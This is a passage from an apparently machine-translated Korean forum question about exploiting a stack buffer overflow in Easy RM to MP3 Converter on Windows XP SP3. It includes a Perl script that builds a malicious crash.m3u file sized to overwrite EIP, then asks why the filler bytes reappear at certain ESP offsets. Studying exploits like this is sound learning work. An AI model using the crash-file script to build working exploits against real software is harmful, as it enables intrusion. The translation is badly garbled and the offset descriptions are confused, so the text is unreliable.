는, 윈도우 XP SP3 (http://www.exploit-db.com/exploits/9177/)에 MP3 변환기 2.7.3.700에 쉬운 RM에 대한 공격 작업, 내가 이해하지 오전 개념을 통해 온, 그것은 다음과 같이 진행됩니다는 쉘 코드 개발, 언젠가 다시 ESP 포인터
악성 파일 생성펄 스크립트 ... 악성 파일을 생성 후
my $junk = "\x41" x 25000;
my $offset = "\x42" x 1072;
my $eip = "\x43" x 4;
my $file = "crash.m3u";
open ($file,">$file");
print $file $junk.$offset.$eip.$adjustment;
close ($file);
는 변환기에 공급하고는 [ESP + 18] (특히 상대 어드레스)으로 스택의 콘텐츠를 분석하는 이유는 이들은 여기있어?
는 말 :
[ESP-43C]에서
B의 시작시 [ESP-88E8]에서의 개시 [ESP-438] 내지 [ESP-C]에서
C 년대 [ESP - 8]
[ESP + 18]에서 [ESP + 418]에이 A가 다시 나타나는 이유는 무엇입니까? 왜 [ESP-18E]에서 [ESP-43C]로 옮겨 졌을 때 [ESP + 18]에서 [ESP + 418]로 반복되는 이유입니까?
감사합니다.